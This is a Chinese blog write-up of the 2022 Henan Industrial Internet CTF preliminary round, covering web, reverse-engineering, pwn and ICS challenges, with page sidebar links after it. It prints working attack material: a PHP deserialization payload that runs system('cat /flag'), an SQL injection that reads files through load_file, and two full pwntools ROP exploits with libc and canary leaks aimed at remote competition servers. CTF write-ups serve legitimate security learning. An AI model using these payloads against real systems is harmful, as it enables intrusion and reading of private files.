2022河南省工业互联网大赛-初赛 wp

已于 2022-11-01 12:15:26 修改
阅读量1.7k 收藏 5
点赞数
分类专栏: 比赛 文章标签: php 开发语言 web安全
于 2022-10-31 21:16:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/127623429
版权

目录

Web

HNGK-xxx

HNGK-DS_Store

HNGK-兰亭集序

HNGK-phpgame

HNGK-out

Reverse 

HNGK-py字节码

HNGK-反调试

HNGK-签到

HNGK-数独

Pwn

HNGK-easybaby

HNGK-easystack

Ics

HNGK-easy_wincc

HNGK-S7Comm协议分析

HNGK-工程文件分析

Web

HNGK-xxx

题目提示了XXX,然后进入后发现了登录框,自然而言就想到了XXE。

然后发现了doLogin.php,用最简单的payload直接打就好。

Flag为: flag{1gggk1jjqt9qaj0288b4a0l7ecdssacl}

HNGK-DS_Store

题目直接就是DS_Store,自然而然地想到了DS_Store缓存,访问一下。

发现bXlwb3AucGhw。

Base64解密发现mypop.php,然后访问,发现php反序列化,直接构造链子,挺简单的。

然后就是绕过parse_url,用///即可。

Exp:

<?php

class Fish{

    public $food;

    public function __construct(){

        $this->food=new Bubble;

    }

}





class Bubble{

    public $bubble;

    public $hack;

    public function __construct(){

        $this->hack = "system('cat /flag');";

    }

}



class Turtle{

    public $head;

    public $tail;

    public function __construct(){

        $this->tail = new Fish;

    }

}



class Stone{

    public $rock;

    public $ash;

    public function __construct(){

        $this->rock=new Turtle();



    }

}

echo serialize(new Stone);

payload:

///mypop.php?data=O:5:"Stone":2:{s:4:"rock";O:6:"Turtle":2:{s:4:"head";N;s:4:"tail";O:4:"Fish":1:{s:4:"food";O:6:"Bubble":2:{s:6:"bubble";N;s:4:"hack";s:20:"system(%27cat%20/flag%27);";}}}s:3:"ash";N;}

flag为:flag{1gghl34udug4rt028abi4k63rdjbfmtk}

HNGK-兰亭集序

发现

看到url上有一个file,直接访问。

得到flag: flag{1gggklgd9uf6nn028abi4k635njbfm7u}

HNGK-phpgame

发现乱码,改变后发现php66.php,访问一下。

发现是一个php代码,发现想是以前写过的题。

用我自己博客上的payload。

?get={"year":"x","items":[0,[],0]}

HNGK-out

明显的sql注入,提示用id,试了一下是get传参。

然后发现了一个select2,猜测在第二个字符位置进行注入,后边发现需要双写and和select,并且过滤了空格。

Payload:

?id=1%27anandd/**/extractvalue(1,concat(0x7e,(sselectelect/**/left(load_file(%27/flag%27),20)),0x7e))%23

然后修改一下长度,即可得到全部flag。

Reverse 

HNGK-py字节码

反编译结果如下

a = 17

b = 13

def rand():

    global seed

    seed = (a*seed+b) % 128

    return seed

print(&apos;please input your flag:&apos;)

flag = str(input())

assert len(flag) >= 20

seed = ord(flag[19])

enc = [102, 3, 46, 0, 78, 102, 103, 57, 116, 63, 110, 127, 121, 59, 57, 33, 49, 11, 110, 18, 6]

data = [102, 50, 35, 35, 35, 17, 67, 35, 69, 35, 51, 34, 35, 69, 35, 69, 35, 51, 34, 35, 153]

for i in range(len(flag)):

    tmp = data[i] ^ i ^ (rand() % 128)

    data[i+1] = ord(flag[i]) ^ tmp

    if data[i+1] != enc[i+1]:

        print(&apos;error!&apos;)

        exit(0)

print(&apos;flag is %s&apos; % (flag))

脚本如下

a = 17
b = 13
def rand():
    global seed
    seed = (a*seed+b) % 128
    return seed
seed = 22
enc = [102, 3, 46, 0, 78, 102, 103, 57, 116, 63, 110, 127, 121, 59, 57, 33, 49, 11, 110, 18, 6]
data = [102, 50, 35, 35, 35, 17, 67, 35, 69, 35, 51, 34, 35, 69, 35, 69, 35, 51, 34, 35, 153]
g = [0]*20
for i in range(20):
    k = rand() % 128
    data[i+1] = data[i] ^ i ^ k
    g[i] = enc[i+1] ^ data[i+1]
    data[i+1] = enc[i+1]
print(bytes(g))

运行得flag

flag{Pyth0n_1s_yyds}

HNGK-反调试

查壳

Ida打开

Tis调试获取dword_41A040=

[0x176,0x39e,0x293,0x3fd,0x11d,0x91,0x229,0x50,0x1f9,0x171,0x12b,0x2ec,0x300,0x8d,0x3fd,0x171,0xd1,0x8d,0xd6,0x50,0x171,0x104,0x219,0x21]

可写如下脚本

a=[0x176,0x39e,0x293,0x3fd,0x11d,0x91,0x229,0x50,0x1f9,0x171,0x12b,0x2ec,0x300,0x8d,0x3fd,0x171,0xd1,0x8d,0xd6,0x50,0x171,0x104,0x219,0x21]
flag=''
for i in range(len(a)):
    for j in range(127):
        if (a[i] * j % 1031 == 1):
            flag+=chr(j)
print(flag)

可得flag

flag{@nt1_d3bug_Ju5t_s0}

HNGK-签到

查壳

有upx壳 

脱壳后ida打开

关键函数

脚本1

Base64解码得

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+

脚本 2

Base64解码得

hP&p0!5L^#3NXLs@*QR%L&UN!L)0%Q^

综合以上,可得脚本。

运行得flag

Flag{ ActI0n5_sp3ak_Louder_than_w0rds}

HNGK-数独

查壳

IDA打开

 

 

关键函数如上,到这里之后

会报错然后转到she,分析后可写脚本。

运行后可得flag

Flag{ Ah9LoOyf2X8q3+P;rzk8ALoiu=ea#Nq+rgbz{+gQPHHKz{XNZOrH26h}

Pwn

HNGK-easybaby

看保护

调试后脚本如下

from pwn import *

context(log_level='debug',os='linux',arch='amd64')

bin = './babygame'
p = remote('47.92.207.120','29459')
elf = ELF(bin)
libc = ELF('./libc-2.31.so')
bss_seg = 0x0000000000405100
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
ret = 0x0000000000401505
pop_rdi_ret = 0x0000000000402c33
pop_rsi_r15_ret = 0x0000000000402c31
gadget_overflow = 0x00000000004014BB
def attack1():
    p.sendlineafter("请输入你的选择:\n",str(3))
    p.sendlineafter("2、逃跑\n",str(1))

def attack2():
    p.sendlineafter("请输入你的选择:\n",str(4))
    for i in range(23):
        p.sendlineafter("2、逃跑\n",str(1))

def attack_up():
    p.sendlineafter("请输入你的选择:\n",str(1))
    p.sendlineafter("7、离开武器店\n",str(4))
    p.sendline(str(7))

for i in range(40):
    attack1()
attack_up()
for i in range(40):
    attack1()
attack_up()
for i in range(40):
    attack1()
attack_up()
attack2()

payload = b'a'*0x30+p64(bss_seg+0x800)+p64(pop_rdi_ret)+p64(read_got)+p64(puts_plt)+p64(0x000000000401190)
p.sendlineafter("好汉,留下你的姓名\n",payload)
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
libc_base = puts_addr-libc.sym['read']
system = libc_base+libc.sym['system']
sh = libc_base+0x1B45BD
success(hex(puts_addr))
success(hex(libc_base))

p.sendline(str(6))

gadget1 = 0x0000000000402C2A
gadget2 = 0x0000000000402C10
payload2  = b'b'*0x28+p64(system)+p64(bss_seg+0x800)
payload2 += p64(pop_rdi_ret)+p64(sh)+p64(ret)+p64(system)
p.sendlineafter("好汉,留下你的姓名\n",payload2)

p.interactive()

Flag为:flag{1gggvgosvlfmgj0288b4a0l737dssb1g}

HNGK-easystack

看保护

 多次调试脚本如下

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './easystack'
#p = process(binary)
p = remote('47.92.207.120',  '23806')
elf = ELF(binary)
libc = elf.libc
#libc = ELF('./libc-2.31.so')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x0000000000401511
bss_seg = 0x0000000000404080
pop_rdi_ret = 0x0000000000401653 #: pop rdi ; ret
def kkk(cc,payload=''):
    p.sendlineafter(">> ",str(cc))
    if cc == 1:
        p.send(payload)

def login():
    payload = b'%4660c%7$n'
    p.sendlineafter("Please input: ",payload)
login()
payload1 = b'a'*0x68+b'b'
kkk(1,payload1)
kkk(2)
p.recvuntil(b'b')
canary = u64(p.recv(7).rjust(8,b'\x00'))

payload = b'c'*0x68+p64(canary)+p64(0)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
kkk(1,payload)
kkk(3)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts_addr-libc.sym['puts']

o = libc_base+libc.sym['open']
rr = libc_base+libc.sym['read']
w = libc_base+libc.sym['write']
pop_rdi_ret = libc_base+0x0000000000023b6a 
pop_rsi_ret = libc_base+0x000000000002601f 
pop_rdx_ret = libc_base+0x0000000000142c92 
orw1  = b'c'*0x68+p64(canary)+p64(0)
orw1 += p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_ret)+p64(bss_seg+0x100)+p64(pop_rdx_ret)+p64(0x100)+p64(rr)+p64(main)

login()
kkk(1,orw1)
kkk(3)
p.send("./flag")

print("open start!")
orw2  = b'c'*0x68+p64(canary)+p64(0)
orw2 += p64(pop_rdi_ret)+p64(bss_seg+0x100)+p64(pop_rsi_ret)+p64(0)+p64(o)+p64(main)
login()
kkk(1,orw2)#SYS_openat
#gdb.attach(r)
#pause()
kkk(3)


print("read start!")
orw3  = b'c'*0x68+p64(canary)+p64(0)
orw3 += p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss_seg+0x200)+p64(pop_rdx_ret)+p64(0x100)+p64(rr)+p64(main)
login()
kkk(1,orw3)

kkk(3)


print("write start!")
orw4  = b'c'*0x68+p64(canary)+p64(0)
orw4 += p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(bss_seg+0x200)+p64(pop_rdx_ret)+p64(0x100)+p64(w)+p64(main)
login()
kkk(1,orw4)
kkk(3)
success(hex(canary))
success(hex(libc_base))
#gdb.attach(r)

p.interactive()

 运行脚本得到flag。

 Flag为:flag{1ggh3rokrm7ol4028abi4k63oujbfmr5}

Ics

HNGK-easy_wincc

找了半天都没发现,最后发现并用了破空工具才出了。

 Flag为: flag{wincc_1s_1nteresting~}

HNGK-S7Comm协议分析

直接打开wireshark,追踪tcp流量。

然后搜索flag,发现一串可疑字符。

对5a6d78685a33747264454a31517a524d656d6f7a6651进行hex解码和base64解码即可得到flag。

Flag为:flag{ktBuC4Lzj3}

HNGK-工程文件分析

找了很久找不到,在网上找到类似题目,猜测被隐藏起来了,利用string来查看不可见字符。

命令:strings $(find . | xargs) | grep flag

 Flag为:flag{3u1xaCYSVSK5cJDT}

f0njl
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2020工业控制安全大赛试题.zip
09-12
“中能融合杯”第六届全国工控系统信息安全攻防竞赛于9月12日上午9:00准时开赛,工控系统信息安全攻防竞赛已成功举办5届,前五届赛事分别聚焦能源电力(火电厂、新能源)、城市公用事业领域燃气、水务、应急响应等领域。第六届大赛告别前五届的线下比拼,迈入“线上+线下”并重的赛事2.0时代,初赛采用CTF夺旗形式。除此之外,赛题设计也更具特色,题目总共分为15道,4个关卡:第一关卡为签到题;第二关卡为传统的互联网竞赛题目;第三、四关卡为工业相关技能竞赛题。
2022 工业互联网安全大赛[北京站]---crypto1 wp
3tefanie丶zhou的博客
09-23 1140
【溪涧长长长去远方,草木高高高在长大,没有长大的孩子会把心里话放在嘴边,长大了的孩子会把心里话好好放在心里。】
2024年最新CTF工控工业互联网(ISC)复现总结WP(超详细)_工控ctf,Flutter中网络图片加载和缓存源码分析
最新发布
2401_84264610的博客
05-11 548
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;工业网络中存在的异常,尝试通过分析PACP流量包,分析出流量数据中的异常点,并拿到FLAG,flag格式为 flag{}。工业网络中存在异常,尝试通过分析PCAP流量包,分析出流量数据中的异常点,并拿到FLAG。
2020全国工业互联网安全技术技能大赛WebWP
李熠专用博客_白帽子一枚,人称低危终结者
10-25 6285
0x00 SimpleCalculator 打开后,发现flag.php可执行数学函数,在网上找到一个原题:https://www.cnblogs.com/20175211lyz/p/11588219.html 可执行shell拿到flag。 payload如下: http://eci-1cei547jhyas2r4f5r2.cloudeci1.ichunqiu.com/flag.php?search=\$pi=(is_nan\^(6).(4)).(tan\^(1).(5));\$pi=\$\$pi;\$p
2022北京工业互联网安全大赛初赛-wakeup
v2ish1yan的博客
09-28 1080
这道题打的时候没做出来,赛后看了别人的wp,看到是用引用来赋值,就自己复现出来了。源码首先要先了解一点基本知识。
2023中国工业互联网安全大赛wp
monster663的博客
07-07 2153
2023中国工业互联网安全大赛决赛WP
赛博地球杯工业互联网安全大赛wp1
08-03
工业互联网安全大赛 WP1 解析 本文将对赛博地球杯工业互联网安全大赛 WP1 进行详细解析,涵盖网络协议、PHP 和 SQL 等相关知识点。 一、网络协议 在 WP1 中,我们可以看到 ping 命令的使用,ping 命令是一种网络...
2022 CSP-J1 CSP-S1 初赛 资料集(2022.07.08).pdf
07-08
CSP-J1 CSP-S1 初赛是中国计算机学会(CCF)举办的全国青少年计算机编程大赛初赛,旨在选拔优秀的青少年编程选手,旨在选拔优秀的青少年编程选手,并为他们提供更多的学习和增长机会。 知识点 2:CSP-J1 CSP-S1 ...
天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
10-05
天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
2018-SDN大赛-初赛题目
12-03
2018-SDN大赛-初赛题目 pdf格式只有题目没有解析。应该是比较全的
2021-2022收藏资料湖北省会计信息化技能大赛初赛理论题三.doc
12-06
2021-2022收藏资料湖北省会计信息化技能大赛初赛理论题三.doc
2020全国工业互联网安全技术技能大赛题目
10-28
含有misc,re,crypto,pwn及题目说明
2021江西工业互联网安全技术技能大赛决赛部分wp
qq_48511129的博客
10-13 1132
智能制造 题目给了一个流量包,从中找flag 直接搜索flag 得到flag为flag{jx2021} 风力发电 题目给了一个流量包 题目描述 风力发电机平时正常转速2500转每分钟,但有一天风力发电机转速异常,请从流量包中找出异常的转速流量之和。 在题目中发现第五个modbus流量包的数据很奇怪 追踪TCP数据流,转换为hex进制 发现这两列基本都是一样的,只有几个是不同的。 找到这个数据的0a 12 和这个数据的 0a a2 两者相加就...
河南省工业互联网大赛(复赛) wp
akxnxbshai的博客
11-12 1845
工控赛复赛,说实话并没有学到什么知识,比赛很水。
工控安全,纵横网络靶场部分WP(一)
Zhangyannn的博客
06-04 3210
纵横网络靶场部分 wp 前言 最近有了misc、二进制、web的一些基础后,准备开始工控安全的一些题目学习。目前做了几道靶场题目,发现主要题型还是和modbus等工控协议相关的流量分析、misc相关等,所以简单做一个记录,以便以后学习回顾。 黑客的大意 题目描述: 文件下载下来后得到的是一个没有格式的文档,所以我们先用winhex或者010看一下文件是什么格式的 可以看到,文件头显示mail文件是png格式的,所以我们修改后缀名,用png格式打开mail文件,得到如下的图片 可以看到得到的图片里面包含
工业线上赛(2022省赛)
njh18790816639的博客
11-02 1055
发现存在upx壳通过工具发现无法脱upx壳(版本4.00),而通过ida分析发现需要通过upx3.96版本进行解压。然后分析加密流程:故我们进入B::cmp函数查看函数是如何进行比较的:(发现以索引为线索进行比较的。
2020年江西工业互联网安全技术技能大赛WP
y920312的专栏
11-09 2888
目录 ## 黑客留下的文件 ## 黑客留下的文件 1、前置知识 已知新型的php一句话木马如果接收到pass参数,则会生成16位的随机秘钥,存储到session中,返回的内容是AES的密钥。 2、用Wireshark打开后,首先看其http流量,发现主要对shell.jsp和.index.php页面进行了请求。 3、通过查看http流量包发现GET /public/.index.php?pass=531和pass632符合新型的木马是随机生产的16位随机密钥。 通过...
2022江西省·振兴杯·数字经济职业技能竞赛&中国工业互联网安全大赛·江西选拔赛初赛wp
monster663的博客
09-11 1395
2022江西省·振兴杯·数字经济职业技能竞赛&中国工业互联网安全大赛·江西选拔赛初赛wp
h3c杯2010全国大学生网络技术大赛----初赛试卷
02-06
h3c杯2010全国大学生网络技术大赛初赛试卷包括了网络基础知识、网络技术应用和网络安全等多个方面的题目。首先是网络基础知识部分,考察参赛选手对网络的结构、协议、设备和常见问题的了解程度。其次是网络技术应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值